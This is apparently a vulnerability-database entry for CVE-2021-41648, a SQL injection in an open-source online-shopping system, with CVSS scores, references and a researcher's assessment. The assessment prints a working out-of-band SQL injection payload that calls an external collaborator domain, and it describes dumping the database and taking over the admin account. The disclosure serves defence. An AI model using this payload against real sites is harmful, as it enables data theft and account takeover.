Attacker Value

Very High

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

CVE-2021-41648

Disclosure Date: October 01, 2021 •

CVE-2021-41648 CVSS v3 Base Score: 7.5

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Execution

Techniques

Validation

Command and Scripting Interpreter: Python

Validated

Exploitation for Client Execution

Validated

User Execution

Validated

User Execution: Malicious File

Validated

Description

An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.

Add Assessment

nu11secur1ty (198)

November 22, 2021 11:55am UTC (2 years ago)•

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

Description:

The p parameter of the PuneethReddyHC online-shopping-system-advanced 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file ('\\\\grb7dmacp8fse7awai6uedfhi8o2cz0q2et1jp8.nu11secur1tycollaborator.net\\mpv')) was submitted in the p parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The malicious user can attack the database using four SQL injection methods (UNION query, time-based blind, error-based and boolean-based blind),
then he can dump all information from this database of the app, then he can log in to the admin account, and can do malicious stuff.
Conclusion: Status Critical.

Reproduce:

href

Proof and Exploit:

href

Action:

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

7.5 High

Impact Score:

3.6

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

None

Availability (A):

None

Vendors

online-shopping-system-advanced project

Products

online-shopping-system-advanced -

References

Canonical

CVE-2021-41648 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41648)

Miscellaneous

https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system

https://github.com/MobiusBinary/CVE-2021-41648

http://packetstormsecurity.com/files/165036/PuneethReddyHC-Online-Shopping-System-Advanced-1.0-SQL-Injection.html

https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41648

https://www.nu11secur1ty.com/2021/11/cve-2021-41648.html

Rapid7

Very High

CVE-2021-41648

Very High

Very High

None

None

Network

CVE-2021-41648

Description

Add Assessment

Ratings

Technical Analysis

CVE-2021-41648

Vendor

Software

Description:

Reproduce:

Proof and Exploit:

Action:

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Very High

CVE-2021-41648

Very High

Very High

None

None

Network

CVE-2021-41648

Description

Add Assessment

Ratings

Technical Analysis

CVE-2021-41648

Vendor

Software

Description:

Reproduce:

Proof and Exploit:

Action:

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification